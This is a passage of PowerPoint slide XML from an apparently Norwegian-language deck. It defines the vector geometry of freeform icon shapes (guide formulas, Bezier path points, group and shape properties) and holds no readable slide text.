              <a:gd name="T19" fmla="*/ 169 h 312"/>
              <a:gd name="T20" fmla="*/ 297 w 579"/>
              <a:gd name="T21" fmla="*/ 309 h 312"/>
              <a:gd name="T22" fmla="*/ 285 w 579"/>
              <a:gd name="T23" fmla="*/ 312 h 312"/>
              <a:gd name="T24" fmla="*/ 84 w 579"/>
              <a:gd name="T25" fmla="*/ 157 h 312"/>
              <a:gd name="T26" fmla="*/ 285 w 579"/>
              <a:gd name="T27" fmla="*/ 257 h 312"/>
              <a:gd name="T28" fmla="*/ 494 w 579"/>
              <a:gd name="T29" fmla="*/ 148 h 312"/>
              <a:gd name="T30" fmla="*/ 290 w 579"/>
              <a:gd name="T31" fmla="*/ 55 h 312"/>
              <a:gd name="T32" fmla="*/ 84 w 579"/>
              <a:gd name="T33" fmla="*/ 157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579" h="312">
                <a:moveTo>
                  <a:pt x="285" y="312"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="281" y="312"/>
                  <a:pt x="277" y="311"/>
                  <a:pt x="273" y="309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="180"/>
                  <a:pt x="15" y="180"/>
                  <a:pt x="15" y="180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6" y="176"/>
                  <a:pt x="0" y="167"/>
                  <a:pt x="0" y="157"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="147"/>
                  <a:pt x="6" y="138"/>
                  <a:pt x="15" y="134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="278" y="3"/>
                  <a:pt x="278" y="3"/>
                  <a:pt x="278" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="285" y="0"/>
                  <a:pt x="293" y="0"/>
                  <a:pt x="300" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="564" y="122"/>
                  <a:pt x="564" y="122"/>
                  <a:pt x="564" y="122"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="573" y="126"/>
                  <a:pt x="579" y="135"/>
                  <a:pt x="579" y="145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="579" y="155"/>
                  <a:pt x="574" y="164"/>
                  <a:pt x="565" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="297" y="309"/>
                  <a:pt x="297" y="309"/>
                  <a:pt x="297" y="309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="311"/>
                  <a:pt x="289" y="312"/>
                  <a:pt x="285" y="312"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84" y="157"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="285" y="257"/>
                  <a:pt x="285" y="257"/>
                  <a:pt x="285" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="494" y="148"/>
                  <a:pt x="494" y="148"/>
                  <a:pt x="494" y="148"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="290" y="55"/>
                  <a:pt x="290" y="55"/>
                  <a:pt x="290" y="55"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="15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sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Freeform 763">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9AE2C72-EEC6-41F9-8D28-758F17252D27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4030852" y="4976299"/>
            <a:ext cx="24125" cy="178719"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 26 w 52"/>
              <a:gd name="T1" fmla="*/ 387 h 387"/>
              <a:gd name="T2" fmla="*/ 0 w 52"/>
              <a:gd name="T3" fmla="*/ 361 h 387"/>
              <a:gd name="T4" fmla="*/ 0 w 52"/>
              <a:gd name="T5" fmla="*/ 26 h 387"/>
              <a:gd name="T6" fmla="*/ 26 w 52"/>
              <a:gd name="T7" fmla="*/ 0 h 387"/>
              <a:gd name="T8" fmla="*/ 52 w 52"/>
              <a:gd name="T9" fmla="*/ 26 h 387"/>
              <a:gd name="T10" fmla="*/ 52 w 52"/>
              <a:gd name="T11" fmla="*/ 361 h 387"/>
              <a:gd name="T12" fmla="*/ 26 w 52"/>
              <a:gd name="T13" fmla="*/ 387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2" h="387">
                <a:moveTo>
                  <a:pt x="26" y="387"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="387"/>
                  <a:pt x="0" y="375"/>
                  <a:pt x="0" y="361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11"/>
                  <a:pt x="12" y="0"/>
                  <a:pt x="26" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="0"/>
                  <a:pt x="52" y="11"/>
                  <a:pt x="52" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="361"/>
                  <a:pt x="52" y="361"/>
                  <a:pt x="52" y="361"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="375"/>
                  <a:pt x="40" y="387"/>
                  <a:pt x="26" y="38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41790" tIns="20895" rIns="41790" bIns="20895" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="962"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="410" name="Gruppe 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99BD403F-7EEA-496D-B484-C1C9804F9433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4324350" y="2108200"/>
            <a:ext cx="387900" cy="540684"/>
            <a:chOff x="5025291" y="3667933"/>
            <a:chExt cx="860113" cy="1116439"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="411" name="Freeform 358">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5E64990-C18A-4570-8BF1-0A1D328E37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9777" y="3667933"/>
              <a:ext cx="475626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7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31 w 635"/>
                <a:gd name="T45" fmla="*/ 432 h 635"/>
                <a:gd name="T46" fmla="*/ 581 w 635"/>
                <a:gd name="T47" fmla="*/ 399 h 635"/>
                <a:gd name="T48" fmla="*/ 536 w 635"/>
                <a:gd name="T49" fmla="*/ 280 h 635"/>
                <a:gd name="T50" fmla="*/ 562 w 635"/>
                <a:gd name="T51" fmla="*/ 189 h 635"/>
                <a:gd name="T52" fmla="*/ 531 w 635"/>
                <a:gd name="T53" fmla="*/ 201 h 635"/>
                <a:gd name="T54" fmla="*/ 447 w 635"/>
                <a:gd name="T55" fmla="*/ 136 h 635"/>
                <a:gd name="T56" fmla="*/ 400 w 635"/>
                <a:gd name="T57" fmla="*/ 53 h 635"/>
                <a:gd name="T58" fmla="*/ 281 w 635"/>
                <a:gd name="T59" fmla="*/ 97 h 635"/>
                <a:gd name="T60" fmla="*/ 190 w 635"/>
                <a:gd name="T61" fmla="*/ 72 h 635"/>
                <a:gd name="T62" fmla="*/ 166 w 635"/>
                <a:gd name="T63" fmla="*/ 158 h 635"/>
                <a:gd name="T64" fmla="*/ 131 w 635"/>
                <a:gd name="T65" fmla="*/ 122 h 635"/>
                <a:gd name="T66" fmla="*/ 137 w 635"/>
                <a:gd name="T67" fmla="*/ 65 h 635"/>
                <a:gd name="T68" fmla="*/ 227 w 635"/>
                <a:gd name="T69" fmla="*/ 4 h 635"/>
                <a:gd name="T70" fmla="*/ 285 w 635"/>
                <a:gd name="T71" fmla="*/ 47 h 635"/>
                <a:gd name="T72" fmla="*/ 368 w 635"/>
                <a:gd name="T73" fmla="*/ 11 h 635"/>
                <a:gd name="T74" fmla="*/ 475 w 635"/>
                <a:gd name="T75" fmla="*/ 31 h 635"/>
                <a:gd name="T76" fmla="*/ 485 w 635"/>
                <a:gd name="T77" fmla="*/ 103 h 635"/>
                <a:gd name="T78" fmla="*/ 569 w 635"/>
                <a:gd name="T79" fmla="*/ 136 h 635"/>
                <a:gd name="T80" fmla="*/ 631 w 635"/>
                <a:gd name="T81" fmla="*/ 226 h 635"/>
                <a:gd name="T82" fmla="*/ 587 w 635"/>
                <a:gd name="T83" fmla="*/ 284 h 635"/>
                <a:gd name="T84" fmla="*/ 587 w 635"/>
                <a:gd name="T85" fmla="*/ 349 h 635"/>
                <a:gd name="T86" fmla="*/ 631 w 635"/>
                <a:gd name="T87" fmla="*/ 407 h 635"/>
                <a:gd name="T88" fmla="*/ 570 w 635"/>
                <a:gd name="T89" fmla="*/ 497 h 635"/>
                <a:gd name="T90" fmla="*/ 485 w 635"/>
                <a:gd name="T91" fmla="*/ 530 h 635"/>
                <a:gd name="T92" fmla="*/ 499 w 635"/>
                <a:gd name="T93" fmla="*/ 569 h 635"/>
                <a:gd name="T94" fmla="*/ 408 w 635"/>
                <a:gd name="T95" fmla="*/ 631 h 635"/>
                <a:gd name="T96" fmla="*/ 107 w 635"/>
                <a:gd name="T97" fmla="*/ 481 h 635"/>
                <a:gd name="T98" fmla="*/ 76 w 635"/>
                <a:gd name="T99" fmla="*/ 450 h 635"/>
                <a:gd name="T100" fmla="*/ 69 w 635"/>
                <a:gd name="T101" fmla="*/ 449 h 635"/>
                <a:gd name="T102" fmla="*/ 52 w 635"/>
                <a:gd name="T103" fmla="*/ 240 h 635"/>
                <a:gd name="T104" fmla="*/ 69 w 635"/>
                <a:gd name="T105" fmla="*/ 184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6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6"/>
                    <a:pt x="285" y="586"/>
                    <a:pt x="285" y="586"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="601"/>
                    <a:pt x="278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5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94" y="495"/>
                    <a:pt x="80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7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1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1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5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3"/>
                    <a:pt x="429" y="515"/>
                    <a:pt x="447" y="497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07" y="437"/>
                    <a:pt x="519" y="432"/>
                    <a:pt x="531" y="432"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="432"/>
                    <a:pt x="531" y="432"/>
                    <a:pt x="531" y="432"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="543" y="432"/>
                    <a:pt x="554" y="437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6" y="399"/>
                    <a:pt x="536" y="378"/>
                    <a:pt x="536" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="536" y="280"/>
                    <a:pt x="536" y="280"/>
                    <a:pt x="536" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="536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53" y="197"/>
                    <a:pt x="542" y="201"/>
                    <a:pt x="531" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="201"/>
                    <a:pt x="531" y="201"/>
                    <a:pt x="531" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="519" y="201"/>
                    <a:pt x="507" y="196"/>
                    <a:pt x="498" y="187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5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4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6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5" y="79"/>
                    <a:pt x="137" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="50"/>
                    <a:pt x="148" y="38"/>
                    <a:pt x="161" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="19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3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0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76" y="450"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="450"/>
                    <a:pt x="76" y="450"/>
                    <a:pt x="76" y="450"/>
                  </a:cubicBezTo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moveTo>
                    <a:pt x="69" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="184"/>
                    <a:pt x="69" y="184"/>
                    <a:pt x="69" y="184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2" name="Freeform 359">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770529B9-E307-445F-8A6F-D2440ADDC6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5029" y="3807487"/>
              <a:ext cx="190821" cy="185125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 123 w 255"/>
                <a:gd name="T1" fmla="*/ 250 h 250"/>
                <a:gd name="T2" fmla="*/ 48 w 255"/>
                <a:gd name="T3" fmla="*/ 222 h 250"/>
                <a:gd name="T4" fmla="*/ 8 w 255"/>
                <a:gd name="T5" fmla="*/ 110 h 250"/>
                <a:gd name="T6" fmla="*/ 34 w 255"/>
                <a:gd name="T7" fmla="*/ 90 h 250"/>
                <a:gd name="T8" fmla="*/ 33 w 255"/>
                <a:gd name="T9" fmla="*/ 56 h 250"/>
                <a:gd name="T10" fmla="*/ 199 w 255"/>
                <a:gd name="T11" fmla="*/ 42 h 250"/>
                <a:gd name="T12" fmla="*/ 214 w 255"/>
                <a:gd name="T13" fmla="*/ 208 h 250"/>
                <a:gd name="T14" fmla="*/ 123 w 255"/>
                <a:gd name="T15" fmla="*/ 250 h 250"/>
                <a:gd name="T16" fmla="*/ 50 w 255"/>
                <a:gd name="T17" fmla="*/ 97 h 250"/>
                <a:gd name="T18" fmla="*/ 57 w 255"/>
                <a:gd name="T19" fmla="*/ 119 h 250"/>
                <a:gd name="T20" fmla="*/ 80 w 255"/>
                <a:gd name="T21" fmla="*/ 184 h 250"/>
                <a:gd name="T22" fmla="*/ 175 w 255"/>
                <a:gd name="T23" fmla="*/ 176 h 250"/>
                <a:gd name="T24" fmla="*/ 167 w 255"/>
                <a:gd name="T25" fmla="*/ 80 h 250"/>
                <a:gd name="T26" fmla="*/ 72 w 255"/>
                <a:gd name="T27" fmla="*/ 88 h 250"/>
                <a:gd name="T28" fmla="*/ 50 w 255"/>
                <a:gd name="T29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5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5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8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39" y="56"/>
                    <a:pt x="96" y="60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3" name="Freeform 360">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24EA4689-F126-4EDC-9307-BC82493BC6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25291" y="4009700"/>
              <a:ext cx="475626" cy="472778"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 368 w 635"/>
                <a:gd name="T1" fmla="*/ 624 h 636"/>
                <a:gd name="T2" fmla="*/ 350 w 635"/>
                <a:gd name="T3" fmla="*/ 587 h 636"/>
                <a:gd name="T4" fmla="*/ 267 w 635"/>
                <a:gd name="T5" fmla="*/ 624 h 636"/>
                <a:gd name="T6" fmla="*/ 160 w 635"/>
                <a:gd name="T7" fmla="*/ 603 h 636"/>
                <a:gd name="T8" fmla="*/ 150 w 635"/>
                <a:gd name="T9" fmla="*/ 531 h 636"/>
                <a:gd name="T10" fmla="*/ 104 w 635"/>
                <a:gd name="T11" fmla="*/ 485 h 636"/>
                <a:gd name="T12" fmla="*/ 32 w 635"/>
                <a:gd name="T13" fmla="*/ 475 h 636"/>
                <a:gd name="T14" fmla="*/ 12 w 635"/>
                <a:gd name="T15" fmla="*/ 368 h 636"/>
                <a:gd name="T16" fmla="*/ 48 w 635"/>
                <a:gd name="T17" fmla="*/ 285 h 636"/>
                <a:gd name="T18" fmla="*/ 4 w 635"/>
                <a:gd name="T19" fmla="*/ 227 h 636"/>
                <a:gd name="T20" fmla="*/ 66 w 635"/>
                <a:gd name="T21" fmla="*/ 137 h 636"/>
                <a:gd name="T22" fmla="*/ 108 w 635"/>
                <a:gd name="T23" fmla="*/ 153 h 636"/>
                <a:gd name="T24" fmla="*/ 73 w 635"/>
                <a:gd name="T25" fmla="*/ 189 h 636"/>
                <a:gd name="T26" fmla="*/ 98 w 635"/>
                <a:gd name="T27" fmla="*/ 281 h 636"/>
                <a:gd name="T28" fmla="*/ 54 w 635"/>
                <a:gd name="T29" fmla="*/ 400 h 636"/>
                <a:gd name="T30" fmla="*/ 137 w 635"/>
                <a:gd name="T31" fmla="*/ 447 h 636"/>
                <a:gd name="T32" fmla="*/ 189 w 635"/>
                <a:gd name="T33" fmla="*/ 562 h 636"/>
                <a:gd name="T34" fmla="*/ 281 w 635"/>
                <a:gd name="T35" fmla="*/ 537 h 636"/>
                <a:gd name="T36" fmla="*/ 400 w 635"/>
                <a:gd name="T37" fmla="*/ 582 h 636"/>
                <a:gd name="T38" fmla="*/ 447 w 635"/>
                <a:gd name="T39" fmla="*/ 498 h 636"/>
                <a:gd name="T40" fmla="*/ 531 w 635"/>
                <a:gd name="T41" fmla="*/ 433 h 636"/>
                <a:gd name="T42" fmla="*/ 563 w 635"/>
                <a:gd name="T43" fmla="*/ 446 h 636"/>
                <a:gd name="T44" fmla="*/ 537 w 635"/>
                <a:gd name="T45" fmla="*/ 354 h 636"/>
                <a:gd name="T46" fmla="*/ 581 w 635"/>
                <a:gd name="T47" fmla="*/ 235 h 636"/>
                <a:gd name="T48" fmla="*/ 531 w 635"/>
                <a:gd name="T49" fmla="*/ 202 h 636"/>
                <a:gd name="T50" fmla="*/ 499 w 635"/>
                <a:gd name="T51" fmla="*/ 188 h 636"/>
                <a:gd name="T52" fmla="*/ 434 w 635"/>
                <a:gd name="T53" fmla="*/ 104 h 636"/>
                <a:gd name="T54" fmla="*/ 400 w 635"/>
                <a:gd name="T55" fmla="*/ 54 h 636"/>
                <a:gd name="T56" fmla="*/ 281 w 635"/>
                <a:gd name="T57" fmla="*/ 98 h 636"/>
                <a:gd name="T58" fmla="*/ 190 w 635"/>
                <a:gd name="T59" fmla="*/ 73 h 636"/>
                <a:gd name="T60" fmla="*/ 189 w 635"/>
                <a:gd name="T61" fmla="*/ 136 h 636"/>
                <a:gd name="T62" fmla="*/ 131 w 635"/>
                <a:gd name="T63" fmla="*/ 159 h 636"/>
                <a:gd name="T64" fmla="*/ 150 w 635"/>
                <a:gd name="T65" fmla="*/ 104 h 636"/>
                <a:gd name="T66" fmla="*/ 161 w 635"/>
                <a:gd name="T67" fmla="*/ 32 h 636"/>
                <a:gd name="T68" fmla="*/ 267 w 635"/>
                <a:gd name="T69" fmla="*/ 12 h 636"/>
                <a:gd name="T70" fmla="*/ 350 w 635"/>
                <a:gd name="T71" fmla="*/ 48 h 636"/>
                <a:gd name="T72" fmla="*/ 409 w 635"/>
                <a:gd name="T73" fmla="*/ 5 h 636"/>
                <a:gd name="T74" fmla="*/ 498 w 635"/>
                <a:gd name="T75" fmla="*/ 66 h 636"/>
                <a:gd name="T76" fmla="*/ 531 w 635"/>
                <a:gd name="T77" fmla="*/ 150 h 636"/>
                <a:gd name="T78" fmla="*/ 603 w 635"/>
                <a:gd name="T79" fmla="*/ 160 h 636"/>
                <a:gd name="T80" fmla="*/ 624 w 635"/>
                <a:gd name="T81" fmla="*/ 267 h 636"/>
                <a:gd name="T82" fmla="*/ 587 w 635"/>
                <a:gd name="T83" fmla="*/ 285 h 636"/>
                <a:gd name="T84" fmla="*/ 624 w 635"/>
                <a:gd name="T85" fmla="*/ 368 h 636"/>
                <a:gd name="T86" fmla="*/ 604 w 635"/>
                <a:gd name="T87" fmla="*/ 475 h 636"/>
                <a:gd name="T88" fmla="*/ 531 w 635"/>
                <a:gd name="T89" fmla="*/ 485 h 636"/>
                <a:gd name="T90" fmla="*/ 486 w 635"/>
                <a:gd name="T91" fmla="*/ 531 h 636"/>
                <a:gd name="T92" fmla="*/ 476 w 635"/>
                <a:gd name="T93" fmla="*/ 603 h 636"/>
                <a:gd name="T94" fmla="*/ 396 w 635"/>
                <a:gd name="T95" fmla="*/ 633 h 636"/>
                <a:gd name="T96" fmla="*/ 566 w 635"/>
                <a:gd name="T97" fmla="*/ 186 h 636"/>
                <a:gd name="T98" fmla="*/ 528 w 635"/>
                <a:gd name="T99" fmla="*/ 153 h 636"/>
                <a:gd name="T100" fmla="*/ 482 w 635"/>
                <a:gd name="T101" fmla="*/ 107 h 636"/>
                <a:gd name="T102" fmla="*/ 153 w 635"/>
                <a:gd name="T103" fmla="*/ 107 h 636"/>
                <a:gd name="T104" fmla="*/ 449 w 635"/>
                <a:gd name="T105" fmla="*/ 69 h 636"/>
                <a:gd name="T106" fmla="*/ 186 w 635"/>
                <a:gd name="T107" fmla="*/ 69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35" h="636">
                  <a:moveTo>
                    <a:pt x="396" y="633"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="633"/>
                    <a:pt x="376" y="630"/>
                    <a:pt x="368" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="615"/>
                    <a:pt x="350" y="602"/>
                    <a:pt x="350" y="587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="587"/>
                    <a:pt x="350" y="587"/>
                    <a:pt x="350" y="587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2"/>
                    <a:pt x="279" y="615"/>
                    <a:pt x="267" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="633"/>
                    <a:pt x="241" y="636"/>
                    <a:pt x="227" y="631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="625"/>
                    <a:pt x="181" y="615"/>
                    <a:pt x="160" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="596"/>
                    <a:pt x="139" y="584"/>
                    <a:pt x="137" y="570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="556"/>
                    <a:pt x="140" y="541"/>
                    <a:pt x="150" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="531"/>
                    <a:pt x="150" y="531"/>
                    <a:pt x="150" y="531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6"/>
                    <a:pt x="80" y="500"/>
                    <a:pt x="66" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="496"/>
                    <a:pt x="39" y="488"/>
                    <a:pt x="32" y="475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="454"/>
                    <a:pt x="11" y="432"/>
                    <a:pt x="4" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="395"/>
                    <a:pt x="3" y="380"/>
                    <a:pt x="12" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="357"/>
                    <a:pt x="33" y="350"/>
                    <a:pt x="48" y="350"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="285"/>
                    <a:pt x="48" y="285"/>
                    <a:pt x="48" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="285"/>
                    <a:pt x="20" y="279"/>
                    <a:pt x="12" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="255"/>
                    <a:pt x="0" y="241"/>
                    <a:pt x="4" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="204"/>
                    <a:pt x="21" y="181"/>
                    <a:pt x="32" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="147"/>
                    <a:pt x="52" y="139"/>
                    <a:pt x="66" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="135"/>
                    <a:pt x="95" y="140"/>
                    <a:pt x="105" y="150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8" y="163"/>
                    <a:pt x="117" y="179"/>
                    <a:pt x="108" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="198"/>
                    <a:pt x="83" y="198"/>
                    <a:pt x="73" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="204"/>
                    <a:pt x="59" y="219"/>
                    <a:pt x="54" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="236"/>
                    <a:pt x="98" y="256"/>
                    <a:pt x="98" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="354"/>
                    <a:pt x="98" y="354"/>
                    <a:pt x="98" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="379"/>
                    <a:pt x="78" y="399"/>
                    <a:pt x="54" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="416"/>
                    <a:pt x="65" y="431"/>
                    <a:pt x="73" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="429"/>
                    <a:pt x="119" y="429"/>
                    <a:pt x="137" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="499"/>
                    <a:pt x="189" y="499"/>
                    <a:pt x="189" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="516"/>
                    <a:pt x="206" y="545"/>
                    <a:pt x="189" y="562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="570"/>
                    <a:pt x="220" y="577"/>
                    <a:pt x="235" y="582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="557"/>
                    <a:pt x="256" y="537"/>
                    <a:pt x="281" y="537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="537"/>
                    <a:pt x="354" y="537"/>
                    <a:pt x="354" y="537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="537"/>
                    <a:pt x="400" y="557"/>
                    <a:pt x="400" y="582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="416" y="577"/>
                    <a:pt x="432" y="570"/>
                    <a:pt x="446" y="562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="429" y="544"/>
                    <a:pt x="430" y="516"/>
                    <a:pt x="447" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499" y="447"/>
                    <a:pt x="499" y="447"/>
                    <a:pt x="499" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="438"/>
                    <a:pt x="519" y="433"/>
                    <a:pt x="531" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="433"/>
                    <a:pt x="531" y="433"/>
                    <a:pt x="531" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="543" y="433"/>
                    <a:pt x="554" y="438"/>
                    <a:pt x="563" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="570" y="431"/>
                    <a:pt x="577" y="416"/>
                    <a:pt x="581" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="557" y="400"/>
                    <a:pt x="537" y="379"/>
                    <a:pt x="537" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="281"/>
                    <a:pt x="537" y="281"/>
                    <a:pt x="537" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="256"/>
                    <a:pt x="557" y="236"/>
                    <a:pt x="581" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="576" y="220"/>
                    <a:pt x="570" y="204"/>
                    <a:pt x="562" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="554" y="197"/>
                    <a:pt x="543" y="202"/>
                    <a:pt x="531" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="202"/>
                    <a:pt x="531" y="202"/>
                    <a:pt x="531" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="519" y="202"/>
                    <a:pt x="507" y="197"/>
                    <a:pt x="499" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="137"/>
                    <a:pt x="447" y="137"/>
                    <a:pt x="447" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="438" y="128"/>
                    <a:pt x="434" y="116"/>
                    <a:pt x="434" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434" y="93"/>
                    <a:pt x="438" y="82"/>
                    <a:pt x="446" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="66"/>
                    <a:pt x="416" y="59"/>
                    <a:pt x="400" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="79"/>
                    <a:pt x="379" y="98"/>
                    <a:pt x="354" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="98"/>
                    <a:pt x="281" y="98"/>
                    <a:pt x="281" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="98"/>
